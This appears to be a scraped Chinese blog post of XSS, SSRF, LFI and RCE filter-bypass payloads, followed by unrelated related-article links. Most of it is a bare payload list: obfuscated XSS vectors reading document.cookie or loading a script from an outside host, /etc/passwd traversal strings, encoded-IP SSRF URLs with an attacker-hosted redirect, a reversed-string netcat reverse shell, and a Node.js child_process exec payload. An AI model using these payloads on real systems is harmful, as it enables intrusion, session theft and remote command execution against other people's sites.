javascript:%ef%bb%bfalert(XSS)  xss%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F  xss%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd  lfi../../etc/passwd  lfi<svG/x=">"/oNloaD=confirm()//  xsshttp://⑯⑨。②⑤④。⑯⑨。②⑤④/  ssrfhttp://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/  ssrfhttp://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/  ssrfhttp://②⑧⑤②⓪③⑨①⑥⑥:80/  ssrfhttp://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/  ssrfhttp://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥  ssrfalert?.(document?.cookie)  xss<x/ onpointerRawupdatE=+\u0061\u006cert&DiacriticalGrave;1&DiacriticalGrave;>Tocuch me!  xss<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">  xss<lol/onauxclick=[0].some(alert)>rightclickhere  xss\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss  xssmarquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>  xss<svg onload='new Function`["__"].find(al\u0065rt)`'>  xss<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">  xss<svg onload=&#97&#108&#101&#114&#116(1)>  xss<svg onload='new Function`["__"].find(al\u0065rt)`'>  xss$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)  rce<svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>  xssFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")();  xss<img src=x onerror="a='',b=!a+a,aa=!b+a,ab=a+{},ba=b[a++],bb=b[baa=a],bab=++baa+a,aaa=ab[baa+bab],b[aaa+=ab[a]+(b.aa+ab)[a]+aa[bab]+ba+bb+b[baa]+aaa+ba+ab[a]+bb][aaa](aa[a]+aa[baa]+b[bab]+bb+ba+'(a)')()"> xss<svg onload=alert("")>  xss<svg onload=alert%26%230000000040"")>  xss<svg onx=() onload=(confirm)(1)>  xss<input/%00/autofocus=""/%00/onfocus=.1|alert`XSS`><object/data=javascript:alert()>  xss<a/href="javascript%0A%0D:alert()">  -(a=alert,b="__",[b].find(a))-'  xss<img/src/onerror=arguments[0].path.pop().['al'+'ert'](1)>file:///etc/x%252Fy/../passwd?/../passwd
<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
<img src="1" onerror=s=createElement('script');body.appendChild(s);s.src="https://14.rs">javas&Tab;cript:alert(1)
<xssBypass/onpointermove=(confirm)(1)>MoveMouseHere
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<img src=l onerror="a:b:c:d:alert(1)">
<a/href="javascript%0A%0D:alert()">
<svg onload=alert%26%230000000040">
<svg onx=() onload=(confirm)(1)>
%3CsVG2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
<object/data=javascript:alert()>
<svg onload=alert(")>
<lol/onauxclick-[0].some(alert)>rightclickhere
<sVG/x=">"/oNloaD=confirm()///*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>

css xss

"><style>@keyframesx{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>><b/style=position:fixed;top:0;left:0;font-size:200px>CSS<

alert绕过


(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[8680439..toString(30)](1)

ssrf重定向绕过

攻击者vps上:


<?phpheader('location: http://127.0.0.1');
?>

测试:


http://target.com/image?url=http://attaker/1.php
cat /etc/passwd{\c''\a""t,/e''*?/?a?s??}{\c''\a""\t,/\e''*?/\p*\d}

nodejs开发软件或者站点下rce
<img src="1" onerror="require('child_process').exec('calc.exe',null);">

xss and ssrf bypass 小tips相关推荐

  1. 本人常用的一些编码小Tips(虽然不多,但很好用)

    本人常用的一些编码小Tips 我是可爱的目录 本人常用的一些编码小Tips 一.概述 二.Windows的一些常用的快捷键 (一).Win + others 类型 (二).Alt + others 类 ...

  2. php childnodes,小tips:HTML DOM中的children和childNodes属性

    childNodes 属性 标准的,childNodes 属性返回节点的子节点集合,以 NodeList 对象.包括HTML节点,所有属性,文本.可以通过nodeType来判断是哪种类型的节点,只有当 ...

  3. 小TIPS:合拼gridview的header

    http://www.cnblogs.com/jackyrong/archive/2006/08/15/477791.html 小TIPS:合拼gridview的header 在asp.net 2.0 ...

  4. 小tips:JS之浅拷贝与深拷贝

    浅拷贝: function extendCopy(p) {var c = {};for (var i in p) {c[i] = p[i];}return c; } 深拷贝: function dee ...

  5. 不定期备考小tips[数模][0] #20210529

    不定期备考小tips[数模][0] #20210529 边值问题 S-L微分方程中两种内积的理解 一种内积:(u,v)=∫uvdx(u,v)=\int uvdx(u,v)=∫uvdx 另一种内积:(u ...

  6. 递归算法中的小Tips

    递归算法中的小Tips 记忆化 尾递归 快速幂 递归的基本操作已经在 二叉树的笔记中介绍了.但是在做题的过程中发现,递归还是有一些小技巧的.有时候一般的递归还有可能超出时间限制 记忆化 在递归的过程中 ...

  7. excel中#N/A的解释同比环比基比画四象限图的小tips字符串截取函数substitute的深入理解

    分组分析,同比环比定基比,字符串截取等问题的总结 EXCEL中#N/A,是"不适用"的意思,多用在填写表格的时候,表示"本栏目(对我)不适用",在没有东西可填写 ...

  8. swift——一些有用的小Tips

    UITableView 有时候UI需要tableView距离上方的元素间隙为0,加上这段代码就行 self.tableView.tableHeaderView = UIView.init(frame: ...

  9. 前端必备,5大mock省时提效小tips,用了提前下班一小时

    一.一些为难前端的业务场景 在我的工作经历里,需要等待后端童鞋配合我的情形大概有以下几种: a.我们跟外部有项目合作,需要调用到第三方接口. 一般这种情况下,商务那边谈合同,走流程,等第三方审核,我们 ...

最新文章

  1. 中文版-He Knows My Name(他知道我的名字)-祂认得我-陈熙(音乐河4)
  2. 高性能计时器Timer的设计(时间轮和时间堆两种方式)
  3. c malloc 头文件_C 数据类型
  4. Android Studio安装插件提示was not installed: Cannot download的解决办法(仅限AS2.2版本以上)
  5. 【渝粤题库】广东开放大学 跨境电商实务之搜索引擎 形成性考核
  6. 前端学习(679):switch语句
  7. Jenkins与Docker的自动化CI/CD实战
  8. 外部方法调用内部_实战经验:通过类成员函数指针实现类方法调用
  9. java中简单的删除添加修改_教你数据库简单实现添加,显示,修改,删除的方法
  10. 怎样在电脑上面简单的记账,了解账户收支
  11. EasyClick IOS 自动化测试报错
  12. 用matlab抽样定理验证,实验一 MATLAB验证抽样定理
  13. 券商股票程序化交易接口(转)
  14. python怎么sqrt开方
  15. 客流分析江湖争端再起,新旧势力谁更胜一筹?...
  16. 安装deepin系统
  17. C语言端口扫描源码,C语言实现TCP多线程端口扫描
  18. 服务器.bat文件启动闪退,直接双击启动tomcat中的startup.bat闪退原因及解决方法
  19. bigdata学习笔记--01 Linux基础--Linux目录结构
  20. 【组图】明星褪去厚厚脂粉的可怖模样!!~

热门文章

  1. 苹果怎么没有4g信号还无服务器,不显示4g信号怎么回事?苹果手机不显示4g信号的解决方法...
  2. java 计算协方差矩阵_MUSIC算法推导及代码实现
  3. 【渝粤题库】陕西师范大学210027 学前儿童舞蹈教育 作业 (专升本)
  4. CAD-VBA中对椭圆的定义
  5. 07-结构型模式(中)
  6. 手把手教你用Python做一个哄女友神器,小白可上手
  7. idea:Unresolved plugin
  8. 《3D打印:正在到来的工业革命》——1.2节为什么使用3D技术打印
  9. FFmpeg教程(三)视频解码器
  10. Linux编程基础:第5章Linux文件系统与操作 课后习题